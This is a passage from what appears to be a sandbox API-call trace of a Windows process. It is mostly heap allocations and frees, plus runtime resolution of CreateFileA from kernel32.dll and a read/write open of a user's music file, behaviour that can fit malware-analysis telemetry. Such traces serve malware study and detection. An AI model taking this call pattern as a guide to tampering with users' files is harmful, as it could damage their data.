Size=0x8) returned 0x8e1ac0 [0186.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0186.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0186.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0186.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0186.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0186.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0186.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0186.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0186.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0186.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0186.843] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.845] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0186.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd4b0 [0186.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd4b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0186.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.846] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0186.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0186.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0186.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd4b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0186.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.846] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0186.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0186.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0186.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0186.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0186.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a", cchWideChar=95, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 95 [0186.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5f) returned 0x9a5d78 [0186.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a", cchWideChar=95, lpMultiByteStr=0x9a5d78, cbMultiByte=95, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a", lpUsedDefaultChar=0x0) returned 95 [0186.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0186.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.848] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\kdbywx3dopbmqwfnv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0186.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0186.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0186.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0186.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0186.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0186.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0186.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0186.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=95, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0186.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xbe) returned 0x9c3478 [0186.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=95, lpWideCharStr=0x9c3478, cchWideChar=95 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.m4a") returned 95 [0186.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0186.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0186.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0186.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0186.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0186.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0186.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0186.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 